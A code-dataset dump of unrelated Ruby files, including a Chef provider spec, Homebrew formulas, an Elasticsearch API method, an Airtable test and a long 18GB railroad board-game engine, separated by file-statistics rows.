fd.shape = cs
# Parameters that affect physics
fd.density = 1
fd.friction = 0.01
fd.restitution = 0.3
# Attach fixture to body
body.create_fixture(fd)
# Give it a random initial velocity (and angular velocity)
body.set_linear_velocity(Vec2.new(rand(-10..10), rand(5..10)))
body.set_angular_velocity(rand(-10..10))
end
end
| 27.652174 | 94 | 0.633386 |
084d1d0acf6cc1696134c504bdf540e887554860 | 3,099 | #
# Author:: Doug MacEachern (<[email protected]>)
# Copyright:: Copyright (c) 2010 VMware, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
class Chef
class Util
class Windows
class NetGroup
end
end
end
end
describe Chef::Provider::Group::Windows do
before do
@node = Chef::Node.new
@events = Chef::EventDispatch::Dispatcher.new
@run_context = Chef::RunContext.new(@node, {}, @events)
@new_resource = Chef::Resource::Group.new("staff")
@net_group = mock("Chef::Util::Windows::NetGroup")
Chef::Util::Windows::NetGroup.stub!(:new).and_return(@net_group)
@provider = Chef::Provider::Group::Windows.new(@new_resource, @run_context)
end
describe "when creating the group" do
it "should call @net_group.local_add" do
@net_group.should_receive(:local_set_members).with([])
@net_group.should_receive(:local_add)
@provider.create_group
end
end
describe "manage_group" do
before do
@new_resource.members([ "us" ])
@current_resource = Chef::Resource::Group.new("staff")
@current_resource.members [ "all", "your", "base" ]
Chef::Util::Windows::NetGroup.stub!(:new).and_return(@net_group)
@net_group.stub!(:local_add_members)
@net_group.stub!(:local_set_members)
@provider.current_resource = @current_resource
end
it "should call @net_group.local_set_members" do
@new_resource.stub!(:append).and_return(false)
@net_group.should_receive(:local_set_members).with(@new_resource.members)
@provider.manage_group
end
it "should call @net_group.local_add_members" do
@new_resource.stub!(:append).and_return(true)
@net_group.should_receive(:local_add_members).with(@new_resource.members)
@provider.manage_group
end
it "should call @net_group.local_set_members if append fails" do
@new_resource.stub!(:append).and_return(true)
@net_group.stub!(:local_add_members).and_raise(ArgumentError)
@net_group.should_receive(:local_add_members).with(@new_resource.members)
@net_group.should_receive(:local_set_members).with(@new_resource.members + @current_resource.members)
@provider.manage_group
end
end
describe "remove_group" do
before do
Chef::Util::Windows::NetGroup.stub!(:new).and_return(@net_group)
@provider.stub!(:run_command).and_return(true)
end
it "should call @net_group.local_delete" do
@net_group.should_receive(:local_delete)
@provider.remove_group
end
end
end
| 32.621053 | 107 | 0.709584 |
5d98c953250ebc2c4dc717d71cd75e6db876f2a6 | 203 | require 'parslet'
# SelfML::Engines
#
# An engine is a parslet transformation
module SelfML::Engines; end
require 'selfml/engines/document'
require 'selfml/engines/array'
require 'selfml/engines/hash'
| 18.454545 | 39 | 0.778325 |
626d6bb5208002e77068a0965b75b00e46d8c0e7 | 354 | require 'spec_helper_acceptance'
describe 'cis_hardening_setup_filesystem class' do
context 'default parameters' do
it 'behaves idempotently' do
idempotent_apply(pp)
end
end
# Disable unused Filesystems - Section 1.1.1
describe file('/etc/modprobe.d/CIS.conf') do
it { should be_file }
it { should be_owned}
end
end | 22.125 | 50 | 0.70904 |
e274ab38b9ef5e4508210d1884f294c9abf0a37d | 1,886 | class LibbitcoinProtocol < Formula
desc "Bitcoin Blockchain Query Protocol"
homepage "https://github.com/libbitcoin/libbitcoin-protocol"
url "https://github.com/libbitcoin/libbitcoin-protocol/archive/v3.6.0.tar.gz"
sha256 "fc41c64f6d3ee78bcccb63fd0879775c62bba5326f38c90b4c6804e2b9e8686e"
license "AGPL-3.0"
revision 8
bottle do
root_url "https://github.com/gromgit/homebrew-core-mojave/releases/download/libbitcoin-protocol"
rebuild 1
sha256 cellar: :any, mojave: "663c93e94d7e3b3a25bae86abf3fd9842b3c700b158c6e95c64d93800778c204"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "pkg-config" => :build
# https://github.com/libbitcoin/libbitcoin-system/issues/1234
depends_on "[email protected]"
depends_on "libbitcoin"
depends_on "zeromq"
def install
ENV.cxx11
ENV.prepend_path "PKG_CONFIG_PATH", Formula["libbitcoin"].opt_libexec/"lib/pkgconfig"
system "./autogen.sh"
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}",
"--with-boost-libdir=#{Formula["[email protected]"].opt_lib}"
system "make", "install"
end
test do
boost = Formula["[email protected]"]
(testpath/"test.cpp").write <<~EOS
#include <bitcoin/protocol.hpp>
int main() {
libbitcoin::protocol::zmq::message instance;
instance.enqueue();
assert(!instance.empty());
assert(instance.size() == 1u);
}
EOS
system ENV.cxx, "-std=c++11", "test.cpp", "-o", "test",
"-I#{boost.include}",
"-L#{Formula["libbitcoin"].opt_lib}", "-lbitcoin",
"-L#{lib}", "-lbitcoin-protocol",
"-L#{boost.lib}", "-lboost_system"
system "./test"
end
end
| 34.290909 | 100 | 0.628844 |
387eb247428b6efb12d73cc86c0e2c64be275539 | 2,506 | require 'test_helper'
class MentorshipTest < Minitest::Test
def setup
VCR.use_cassette('airtable/mentorship/successful') do
@successful_response = Airtable::Mentorship.new.mentor_request_data
end
end
def test_mentor_request_data_returns_correct_keys
assert @successful_response.keys.sort == %i[mentors services skillsets]
end
def test_mentor_request_data_returns_correct_mentor_data
mentor = @successful_response[:mentors].first
assert mentor[:id].present?
assert mentor[:name].present?
end
def test_mentor_request_data_returns_correct_service_data
service = @successful_response[:services].first
assert service[:id].present?
assert service[:name].present?
end
def test_mentor_request_data_returns_correct_skillset_data
skillset = @successful_response[:skillsets].first
assert skillset[:id].present?
assert skillset[:name].present?
end
def test_429_raises_airtable_error
VCR.use_cassette('airtable/mentorship/exceeded_rate_limit') do
assert_raises Airtable::Error do
Airtable::Mentorship.new.mentor_request_data
end
end
end
def test_create_mentor_request_creates_the_passed_mentor_request
VCR.use_cassette('airtable/mentorship/post_successful') do
request_body = {
slack_user: 'test_case_1',
services: 'rec3ZQMCQsKPKlE2C',
skillsets: 'Java',
additional_details: 'Some test description.',
mentor_requested: 'rec0SDZDK2DiW4PY9'
}
response = Airtable::Mentorship.new.create_mentor_request(request_body)
assert response['id'].present?
assert response.dig('fields', 'Slack User') == request_body[:slack_user]
assert response.dig('fields', 'Service') == [request_body[:services]]
assert response.dig('fields', 'Skillsets') == [request_body[:skillsets]]
assert response.dig('fields', 'Additional Details') == request_body[:additional_details]
assert response.dig('fields', 'Mentor Requested') == [request_body[:mentor_requested]]
end
end
def test_format_for_posting_converts_comma_separated_string_into_array_of_strings
instance = Airtable::Mentorship.new
converted = instance.send(:format_for_posting, 'this , and long ')
assert converted == ['this', 'and long']
converted = instance.send(:format_for_posting, 'this,that')
assert converted == ['this', 'that']
converted = instance.send(:format_for_posting, 'this')
assert converted == ['this']
end
end
| 32.545455 | 94 | 0.731445 |
f71d26344e32e3b35da2485933a300c73b776f31 | 3,222 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
module API
module Indices
module Actions
# DEPRECATED Upgrades to the current version of Lucene.
#
# @option arguments [List] :index A comma-separated list of index names; use `_all` or empty string to perform the operation on all indices
# @option arguments [Boolean] :allow_no_indices Whether to ignore if a wildcard indices expression resolves into no concrete indices. (This includes `_all` string or when no indices have been specified)
# @option arguments [String] :expand_wildcards Whether to expand wildcard expression to concrete indices that are open, closed or both.
# (options: open,closed,hidden,none,all)
# @option arguments [Boolean] :ignore_unavailable Whether specified concrete indices should be ignored when unavailable (missing or closed)
# @option arguments [Boolean] :wait_for_completion Specify whether the request should block until the all segments are upgraded (default: false)
# @option arguments [Boolean] :only_ancient_segments If true, only ancient (an older Lucene major release) segments will be upgraded
# @option arguments [Hash] :headers Custom HTTP headers
#
# *Deprecation notice*:
# The _upgrade API is no longer useful and will be removed. Instead, see _reindex API.
# Deprecated since version 8.0.0
#
#
# @see https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-upgrade.html
#
def upgrade(arguments = {})
headers = arguments.delete(:headers) || {}
arguments = arguments.clone
_index = arguments.delete(:index)
method = Elasticsearch::API::HTTP_POST
path = if _index
"#{Utils.__listify(_index)}/_upgrade"
else
"_upgrade"
end
params = Utils.__validate_and_extract_params arguments, ParamsRegistry.get(__method__)
body = nil
perform_request(method, path, params, body, headers).body
end
# Register this action with its valid params when the module is loaded.
#
# @since 6.2.0
ParamsRegistry.register(:upgrade, [
:allow_no_indices,
:expand_wildcards,
:ignore_unavailable,
:wait_for_completion,
:only_ancient_segments
].freeze)
end
end
end
end
| 43.540541 | 210 | 0.681254 |
edd2c1fbd77ef3f063b3f9735fa890ec1613a80d | 1,495 | class ArmLinuxGnueabihfBinutils < Formula
desc "FSF/GNU binutils for cross-compiling to arm-linux"
homepage "https://www.gnu.org/software/binutils/binutils.html"
url "https://ftp.gnu.org/gnu/binutils/binutils-2.35.tar.gz"
mirror "https://ftpmirror.gnu.org/binutils/binutils-2.35.tar.gz"
sha256 "a3ac62bae4f339855b5449cfa9b49df90c635adbd67ecb8a0e7f3ae86a058da6"
license "GPL-2.0"
livecheck do
url :stable
end
bottle do
sha256 "743bac0fdd042088a61631b9fca121fd89d0bab810a6814448a0b70897adc84c" => :catalina
sha256 "470b88640a1bbfafbb2bf219a9e8942ee9a0a376fa9b178a25d7edf52db63a87" => :mojave
sha256 "cfda8211e77355eb5548d7634e97e2d7d917de459c48245af2de34d01266c2b1" => :high_sierra
end
def install
ENV.cxx11
# Avoid build failure: https://sourceware.org/bugzilla/show_bug.cgi?id=23424
ENV.append "CXXFLAGS", "-Wno-c++11-narrowing"
system "./configure", "--disable-debug",
"--disable-dependency-tracking",
"--enable-deterministic-archives",
"--prefix=#{prefix}",
"--disable-werror",
"--target=arm-linux-gnueabihf",
"--enable-gold=yes",
"--enable-ld=yes",
"--enable-interwork"
system "make"
system "make", "install"
end
test do
assert_match "f()", shell_output("#{bin}/arm-linux-gnueabihf-c++filt _Z1fv")
end
end
| 35.595238 | 93 | 0.63612 |
ab4d115003c5bc43498b4d012d096f8af83fbdd4 | 744 | class Api::V1::MessagesController < ApplicationController
before_action :authenticate_with_token!
def index
if chat = Chat.find(chat_id)
render json: {
operation: :index,
status: :success,
data: {
chat: chat,
messages: chat.messages
},
}
else
render json: {
operation: :create,
status: :failed,
}
end
end
def create
message = Message.new(message_params.merge!({sender_id: current_user.id}))
render json: message.save
end
private
def message_params
params.require(:message).permit(:content, :chat_id).to_h
end
def chat_id
params[:chat_id] || params.require(:message).permit(:chat_id).to_h
end
end
| 20.108108 | 78 | 0.616935 |
b9b13a11addfa9fb5c45ba471a147ded2340762d | 80 | # frozen_string_literal: true
module RubygemsDownloads
VERSION = '0.1.3'
end
| 13.333333 | 29 | 0.7625 |
2844fb68e9644a93976a358b3e60f759fb008f97 | 509 | # frozen_string_literal: true
# typed: true
# compiled: true
class A < T::Struct
extend T::Sig
# Sorbet will generate a `sig` for the synthetic declaration of this function,
# but the compiler will not emit the actual definition -- that work will be
# done by sorbet-runtime, and therefore we should mimic the behavior of
# sorbet-runtime here.
prop :foo, String
end
s = T::Utils.signature_for_method(A.instance_method(:foo))
p s.nil?
p s&.method&.name
p s&.method_name
p s&.return_type&.name
| 24.238095 | 80 | 0.730845 |
628662415804d2752db4404a84bbe1ad24834911 | 28,109 | # frozen_string_literal: true
require_relative '../base'
require_relative '../cities_plus_towns_route_distance_str'
require_relative '../trainless_shares_half_value'
require_relative 'meta'
require_relative 'entities'
require_relative 'map'
require_relative 'scenarios'
require_relative 'round/operating'
require_relative 'step/buy_sell_par_shares'
require_relative 'step/buy_train'
require_relative 'step/dividend'
require_relative 'step/emr_share_buying'
require_relative 'step/route'
require_relative 'step/special_choose'
require_relative 'step/special_token'
require_relative 'step/track_and_token'
require_relative 'step/waterfall_auction'
module Engine
module Game
module G18GB
class Game < Game::Base
include_meta(G18GB::Meta)
include CitiesPlusTownsRouteDistanceStr
include Entities
include Map
include Scenarios
include TrainlessSharesHalfValue
attr_reader :scenario
attr_accessor :train_bought
GAME_END_CHECK = { final_train: :current_or, stock_market: :current_or }.freeze
BANKRUPTCY_ALLOWED = false
BANK_CASH = 99_999
CURRENCY_FORMAT_STR = 'ยฃ%d'
CERT_LIMIT_INCLUDES_PRIVATES = false
PRESIDENT_SALES_TO_MARKET = true
MIN_BID_INCREMENT = 5
MUST_BID_INCREMENT_MULTIPLE = true
ONLY_HIGHEST_BID_COMMITTED = true
CAPITALIZATION = :full
SELL_BUY_ORDER = :sell_buy
SOLD_OUT_INCREASE = false
NEXT_SR_PLAYER_ORDER = :first_to_pass
MUST_SELL_IN_BLOCKS = true
SELL_AFTER = :any_time
TRACK_RESTRICTION = :restrictive
EBUY_OTHER_VALUE = false
HOME_TOKEN_TIMING = :float
DISCARDED_TRAINS = :remove
TILE_LAYS = [{ lay: true, upgrade: true }, { lay: true, upgrade: true }].freeze
IMPASSABLE_HEX_COLORS = %i[gray red].freeze
MARKET_SHARE_LIMIT = 100
SHOW_SHARE_PERCENT_OWNERSHIP = true
MARKET_TEXT = Base::MARKET_TEXT.merge(
unlimited: 'May buy shares from IPO in excess of 60%',
)
MARKET = [
%w[50o 55o 60o 65o 70p 75p 80p 90p 100p 115 130 145 160 180 200 220 240 265 290 320 350e 380e],
].freeze
STOCKMARKET_COLORS = Base::STOCKMARKET_COLORS.merge(
unlimited: :yellow,
)
EVENTS_TEXT = {
'float_60' =>
['Start with 60% sold', 'New corporations float once 60% of their shares have been sold'],
'float_10_share' =>
['Start as 10-share', 'New corporations are 10-share corporations (that float at 60%)'],
'remove_unstarted' =>
['Remove unstarted corps', 'Unstarted corporations are removed along with one 6X train each'],
}.freeze
STATUS_TEXT = Base::STATUS_TEXT.merge(
'bonus_20_20' => ['NS ยฃ20, EW ยฃ20', 'North-South bonus ยฃ20, East-West bonus ยฃ20'],
'bonus_20_30' => ['NS ยฃ20, EW ยฃ30', 'North-South bonus ยฃ20, East-West bonus ยฃ30'],
'bonus_20_40' => ['NS ยฃ20, EW ยฃ40', 'North-South bonus ยฃ20, East-West bonus ยฃ40'],
'only_pres_drop' => ['Only pres. sales drop', 'Only sales by corporation presidents drop the share price'],
).freeze
PHASES = [
{
name: '2+1',
train_limit: { '5-share': 3, '10-share': 4 },
tiles: [:yellow],
status: ['bonus_20_20'],
operating_rounds: 2,
},
{
name: '3+1',
on: '3+1',
train_limit: { '5-share': 3, '10-share': 4 },
tiles: %i[yellow green],
status: ['bonus_20_20'],
operating_rounds: 2,
},
{
name: '4+2',
on: '4+2',
train_limit: { '5-share': 2, '10-share': 3 },
tiles: %i[yellow green blue],
status: ['bonus_20_30'],
operating_rounds: 2,
},
{
name: '5+2',
on: '5+2',
train_limit: { '5-share': 2, '10-share': 3 },
tiles: %i[yellow green blue brown],
status: ['bonus_20_30'],
operating_rounds: 2,
},
{
name: '4X',
on: '4X',
train_limit: 2,
tiles: %i[yellow green blue brown],
status: ['bonus_20_30'],
operating_rounds: 2,
},
{
name: '5X',
on: '5X',
train_limit: 2,
tiles: %i[yellow green blue brown],
status: ['bonus_20_30'],
operating_rounds: 2,
},
{
name: '6X',
on: '6X',
train_limit: 2,
tiles: %i[yellow green blue brown gray],
status: %w[bonus_20_40 only_pres_drop],
operating_rounds: 2,
},
].freeze
TRAINS = [
{
name: '2+1',
distance: [
{
'nodes' => ['town'],
'pay' => 1,
'visit' => 1,
},
{
'nodes' => %w[city offboard town],
'pay' => 2,
'visit' => 2,
},
],
price: 80,
rusts_on: '4+2',
},
{
name: '3+1',
distance: [
{
'nodes' => ['town'],
'pay' => 1,
'visit' => 1,
},
{
'nodes' => %w[city offboard town],
'pay' => 3,
'visit' => 3,
},
],
price: 200,
rusts_on: '4X',
events: [
{
'type' => 'float_60',
},
],
},
{
name: '4+2',
distance: [
{
'nodes' => ['town'],
'pay' => 2,
'visit' => 2,
},
{
'nodes' => %w[city offboard town],
'pay' => 4,
'visit' => 4,
},
],
price: 300,
rusts_on: '6X',
},
{
name: '5+2',
distance: [
{
'nodes' => ['town'],
'pay' => 2,
'visit' => 2,
},
{
'nodes' => %w[city offboard town],
'pay' => 5,
'visit' => 5,
},
],
price: 500,
events: [
{
'type' => 'float_10_share',
},
],
},
{
name: '4X',
distance: [
{
'nodes' => %w[city offboard],
'pay' => 4,
'visit' => 4,
},
{
'nodes' => ['town'],
'pay' => 0,
'visit' => 99,
},
],
price: 550,
},
{
name: '5X',
distance: [
{
'nodes' => %w[city offboard],
'pay' => 5,
'visit' => 5,
},
{
'nodes' => ['town'],
'pay' => 0,
'visit' => 99,
},
],
price: 650,
available_on: '4X',
},
{
name: '6X',
distance: [
{
'nodes' => %w[city offboard],
'pay' => 6,
'visit' => 6,
},
{
'nodes' => ['town'],
'pay' => 0,
'visit' => 99,
},
],
price: 700,
events: [
{
'type' => 'remove_unstarted',
},
],
available_on: '5X',
},
].freeze
def init_scenario(optional_rules)
num_players = @players.size
two_east_west = optional_rules.include?(:two_player_ew)
four_alternate = optional_rules.include?(:four_player_alt)
case num_players
when 2
SCENARIOS[two_east_west ? '2EW' : '2NS']
when 3
SCENARIOS['3']
when 4
SCENARIOS[four_alternate ? '4Alt' : '4Std']
when 5
SCENARIOS['5']
else
SCENARIOS['6']
end
end
def init_optional_rules(optional_rules)
optional_rules = super(optional_rules)
@scenario = init_scenario(optional_rules)
optional_rules
end
def optional_hexes
case @scenario['map']
when '2NS'
self.class::HEXES_2P_NW
when '2EW'
self.class::HEXES_2P_EW
else
self.class::HEXES
end
end
def num_trains(train)
@scenario['train_counts'][train[:name]]
end
def game_cert_limit
@scenario['cert-limit']
end
VALID_ABILITIES_OPEN = %i[blocks_hexes choose_ability reservation].freeze
VALID_ABILITIES_CLOSED = %i[hex_bonus reservation tile_lay token].freeze
def abilities(entity, type = nil, time: nil, on_phase: nil, passive_ok: nil, strict_time: nil)
return if entity&.player?
ability = super
return ability unless entity&.company?
return unless ability
valid = entity.value.positive? ? VALID_ABILITIES_OPEN : VALID_ABILITIES_CLOSED
valid.include?(ability.type) ? ability : nil
end
def remove_blockers!(company)
ability = abilities(company, :blocks_hexes)
return unless ability
ability.hexes.each do |hex|
hex_by_id(hex).tile.blockers.reject! { |c| c == company }
end
company.remove_ability(ability)
end
def close_company(company)
@bank.spend(company.revenue, company.owner)
@log << "#{company.name} closes, paying #{format_currency(company.revenue)} to #{company.owner.name}"
remove_blockers!(company)
company.revenue = 0
company.value = 0
end
def close_company_in_hex(hex)
@companies.each do |company|
block = abilities(company, :blocks_hexes)
close_company(company) if block&.hexes&.include?(hex.coordinates)
end
end
def game_companies
scenario_comps = @scenario['companies']
self.class::COMPANIES.select { |comp| scenario_comps.include?(comp[:sym]) }
end
def game_corporations
scenario_corps = @scenario['corporations'] + @scenario['corporation-extra'].sort_by { rand }.take(1)
self.class::CORPORATIONS.select { |corp| scenario_corps.include?(corp[:sym]) }
end
def game_tiles
if @scenario['gray-tiles']
self.class::TILES.merge(self.class::GRAY_TILES)
else
self.class::TILES
end
end
def init_starting_cash(players, bank)
cash = @scenario['starting-cash']
players.each do |player|
bank.spend(cash, player)
end
end
def setup
tiers = {}
delayed = 0
@corporations.sort_by { rand }.each do |corp|
if (corp.id != 'LNWR') && (delayed < @scenario['tier2-corps'])
tiers[corp.id] = 2
delayed += 1
else
tiers[corp.id] = 1
end
end
tier1, tier2 = tiers.partition { |_co, tier| tier == 1 }
@log << "Corporations available SR1: #{tier1.map(&:first).sort.join(', ')}"
@log << "Corporations available SR2: #{tier2.map(&:first).sort.join(', ')}"
@tiers = tiers
@insolvent_corps = []
@train_bought = false
end
def event_float_60!
@log << '-- Event: New corporations float once 60% of their shares have been sold --'
@corporations.reject(&:floated?).each { |c| c.float_percent = 60 }
end
def event_float_10_share!
@log << '-- Event: Unstarted corporations are converted to 10-share corporations --'
@corporations.reject(&:floated?).each { |c| convert_to_ten_share(c) }
end
def event_remove_unstarted!
@log << '-- Event: Unstarted corporations are removed --'
remove_trains = @depot.trains.select { |t| t.name == '6X' }
@corporations.reject(&:floated?).each do |corporation|
close_corporation(corporation, quiet: true)
if (train = remove_trains.pop)
@depot.remove_train(train)
@log << "#{corporation.id} closes, removing a 6X train"
else
@log << "#{corporation.id} closes"
end
end
end
def sorted_corporations
case @round
when Engine::Round::Stock
ipoed, others = @corporations.reject { |corp| @tiers[corp.id] > @round_counter }.partition(&:ipoed)
ipoed.sort + others
when Engine::Round::Operating
[@round.current_operator]
else
[]
end
end
def required_bids_to_pass
@scenario['required_bids']
end
def new_auction_round
Engine::Round::Auction.new(self, [
Engine::Step::CompanyPendingPar,
G18GB::Step::WaterfallAuction,
])
end
def init_round_finished
@players.sort_by! { |p| [p.cash, [email protected] { |c| c.owner == p }] }
end
def check_new_layer; end
def par_prices(_corp)
stock_market.par_prices
end
def lnwr_ipoed?
@corporations.find { |corp| corp.id == 'LNWR' }&.ipoed
end
def married_to_lnwr(player)
return false if lnwr_ipoed?
@companies.any? { |co| co.owner == player && co.sym == 'LB' }
end
def can_par?(corporation, player)
return true if lnwr_ipoed?
if married_to_lnwr(player)
# player owns the LB so can only start the LNWR
corporation.id == 'LNWR'
else
# player doesn't own the LB so can start any except the LNWR
corporation.id != 'LNWR'
end
end
def non_president_sales_drop_price?
[email protected]?('only_pres_drop')
end
def num_certs(entity)
entity.shares.sum(&:cert_size)
end
def sell_shares_and_change_price(bundle, allow_president_change: true, swap: nil)
corporation = bundle.corporation
price = corporation.share_price.price
was_president = corporation.president?(bundle.owner)
@share_pool.sell_shares(bundle, allow_president_change: allow_president_change, swap: swap)
bundle.num_shares.times { @stock_market.move_down(corporation) } if non_president_sales_drop_price? || was_president
log_share_price(corporation, price)
end
def insolvent?(corp)
@insolvent_corps.include?(corp)
end
def make_insolvent(corp)
return if insolvent?(corp)
@insolvent_corps << corp
@log << "#{corp.name} is now Insolvent"
end
def clear_insolvent(corp)
return unless insolvent?(corp)
@insolvent_corps.delete(corp)
@log << "#{corp.name} is no longer Insolvent"
end
def status_array(corp)
status = []
status << %w[10-share bold] if corp.type == :'10-share'
status << %w[5-share bold] if corp.type == :'5-share'
status << %w[Insolvent bold] if insolvent?(corp)
status << %w[Receivership bold] if corp.receivership?
status
end
def float_corporation(corporation)
super
return unless corporation.type == :'10-share'
bundle = ShareBundle.new(corporation.shares_of(corporation))
@share_pool.transfer_shares(bundle, @share_pool)
end
def place_home_token(corporation)
return if corporation.tokens.first&.used
hex = hex_by_id(corporation.coordinates)
tile = hex&.tile
if !tile || (tile.reserved_by?(corporation) && !tile.paths.empty?)
# If the tile has no paths at the present time, clear up the ambiguity when the tile is laid
# Otherwise, for yellow tiles the corporation is placed disconnected and for other tiles it
# chooses now
if tile.color == :yellow
cities = tile.cities
city = cities[1]
token = corporation.find_token_by_type
return unless city.tokenable?(corporation, tokens: token)
@log << "#{corporation.name} places a token on #{hex.name}"
city.place_token(corporation, token)
else
@log << "#{corporation.name} must choose city for home token"
@round.pending_tokens << {
entity: corporation,
hexes: [hex],
token: corporation.find_token_by_type,
}
end
return
end
cities = tile.cities
city = cities.find { |c| c.reserved_by?(corporation) } || cities.first
token = corporation.find_token_by_type
return unless city.tokenable?(corporation, tokens: token)
@log << "#{corporation.name} places a token on #{hex.name}"
city.place_token(corporation, token)
end
def add_new_share(share)
owner = share.owner
corporation = share.corporation
corporation.share_holders[owner] += share.percent if owner
owner.shares_by_corporation[corporation] << share
@_shares[share.id] = share
end
def convert_capital(corporation, emergency)
steps = emergency ? 3 : 2
5 * stock_market.find_share_price(corporation, [:left] * steps).price
end
def convert_to_ten_share(corporation, price_drops = 0, blame_president = false)
# update corporation type and report conversion
corporation.type = :'10-share'
@log << (if blame_president
"#{corporation.owner.name} converts #{corporation.id} into a 10-share corporation"
else
"#{corporation.id} converts into a 10-share corporation"
end)
# update existing shares to 10% shares
original_shares = shares_for_corporation(corporation)
corporation.share_holders.clear
original_shares.each { |s| s.percent = 10 }
original_shares.first.percent = 20
original_shares.each { |s| corporation.share_holders[s.owner] += s.percent }
# create new shares
owner = corporation.floated? ? @share_pool : corporation
shares = Array.new(5) { |i| Share.new(corporation, percent: 10, index: i + 4, owner: owner) }
shares.each do |share|
add_new_share(share)
end
# create new tokens and remove reminder from charter
corporation.abilities.dup.each do |ability|
if ability&.description&.start_with?('Conversion tokens:')
ability.count.times { corporation.tokens << Engine::Token.new(corporation, price: 50) }
corporation.remove_ability(ability)
end
end
# update share price
unless price_drops.zero?
prev = corporation.share_price.price
price_drops.times { @stock_market.move_down(corporation) }
log_share_price(corporation, prev)
end
# add new capital
return unless corporation.floated?
capital = corporation.share_price.price * 5
@bank.spend(capital, corporation)
@log << "#{corporation.id} receives #{format_currency(capital)}"
end
def stock_round
Engine::Round::Stock.new(self, [
Engine::Step::HomeToken,
G18GB::Step::BuySellParShares,
])
end
def hex_blocked_by_ability?(_entity, ability, hex)
phase.tiles.include?(:blue) ? false : super
end
def special_green_hexes(corporation)
return {} unless corporation&.corporation?
corporation.abilities.flat_map { |a| a.type == :tile_lay ? a.hexes.map { |h| [h, a.tiles] } : [] }.to_h
end
def add_new_special_green_hex(corporation, hex_coords)
ability = {
type: 'tile_lay',
hexes: [hex_coords],
tiles: %w[G36 G37 G38],
cost: 0,
reachable: true,
consume_tile_lay: true,
description: "May place a green tile in #{hex_coords}",
desc_detail: "May place a green tile in #{hex_coords}, instead of the usual yellow tile, even before green tiles " \
'are normally available',
}
corporation.add_ability(Engine::Ability::TileLay.new(**ability))
end
def upgrades_to?(from, to, special = false, selected_company: nil)
corporation = @round.current_entity
sgh = special_green_hexes(corporation)
if to.color == :green &&
sgh.include?(from.hex.coordinates) &&
sgh[from.hex.coordinates].include?(to.name) &&
Engine::Tile::COLORS.index(to.color) > Engine::Tile::COLORS.index(from.color)
return true
end
super
end
def upgrades_to_correct_color?(from, to)
(from.color == to.color && from.color == :blue) || super
end
def legal_tile_rotation?(_entity, _hex, tile)
return super unless tile.color == :blue
tile.rotation.zero?
end
def route_trains(entity)
return super unless insolvent?(entity)
[@depot.min_depot_train]
end
def express_train?(train)
train.name.end_with?('X')
end
def train_owner(train)
train.owner == @depot ? lessee : train.owner
end
def lessee
current_entity
end
def revenue_bonuses(route, stops)
stop_hexes = stops.map { |stop| stop.hex.name }
@companies.select { |co| co.owner == route&.corporation&.owner }.flat_map do |co|
if co.value.positive?
[]
else
co.abilities.select { |ab| ab.type == :hex_bonus }.flat_map do |ab|
ab.hexes.select { |h| stop_hexes.include?(h) }.map { |_| { revenue: ab.amount, description: co.sym } }
end
end
end
end
def revenue_info(route, stops)
standard = revenue_bonuses(route, stops) + estuary_bonuses(route) + compass_bonuses(route)
return standard unless express_train?(route.train)
standard + distance_bonus(route, stops)
end
def revenue_for(route, stops)
# count only unique hexes in determining revenue
stop_revenues = stops.uniq { |s| s.hex.name }.map { |s| s.route_revenue(route.phase, route.train) }
stop_revenues.sum + revenue_info(route, stops).sum { |bonus| bonus[:revenue] }
end
def revenue_str(route)
route.stops.map { |s| s.hex.name }.join('-') + revenue_info(route, route.stops).map do |bonus|
if bonus[:description] == 'X'
"+#{format_currency(bonus[:revenue])}"
else
"+(#{bonus[:description]})"
end
end.join
end
def compass_points_in_network(network_hexes)
@scenario['compass-hexes'].reject { |_compass, compass_hexes| (network_hexes & compass_hexes).empty? }.map(&:first)
end
def ns_bonus
20
end
def ew_bonus
if @phase.status.include?('bonus_20_40')
40
elsif @phase.status.include?('bonus_20_30')
30
else
20
end
end
def routes_intersect(first, second)
!(first.visited_stops & second.visited_stops).empty?
end
def route_sets_intersect(first, second)
first.any? { |a| second.any? { |b| routes_intersect(a, b) } }
end
def combine_route_sets(sets)
# simplify overlapping route sets by combining them where possible
overlapped = []
sets.combination(2).select { |first, second| route_sets_intersect(first, second) }.each do |first, second|
overlapped << second
second.each { |route| first << route }
end
sets.reject { |set| overlapped.include?(set) }
end
def route_sets(routes)
sets = routes.map { |route| [route] }
return [] if sets.empty?
prev_length = 0
while sets.size != prev_length
prev_length = sets.size
sets = combine_route_sets(sets)
end
sets
end
def compass_bonuses(route)
bonuses = []
return bonuses if route.chains.empty?
route_set = route_sets(route.routes).find { |set| set.include?(route) } || []
return bonuses unless route == route_set.first # apply bonus to the first route in the set
hexes = route_set.flat_map { |r| r.ordered_paths.map { |path| path.hex.coordinates } }
points = compass_points_in_network(hexes)
bonuses << { revenue: ns_bonus, description: 'NS' } if points.include?('N') && points.include?('S')
bonuses << { revenue: ew_bonus, description: 'EW' } if points.include?('E') && points.include?('W')
bonuses
end
def estuary_bonuses(route)
route.ordered_paths.map do |path|
if path.hex.coordinates == 'I4' && path.track == :dual
{ revenue: 40, description: 'FT' }
elsif path.hex.coordinates == 'C22' && path.track == :dual
{ revenue: 30, description: 'S' }
end
end.compact
end
def distance_bonus(route, _stops)
return [] if route.chains.empty?
visited = route.visited_stops.reject { |stop| stop.hex.tile.cities.empty? && stop.hex.tile.offboards.empty? }
start = visited.first.hex
finish = visited.last.hex
[{ revenue: hex_crow_distance(start, finish) * 10, description: 'X' }]
end
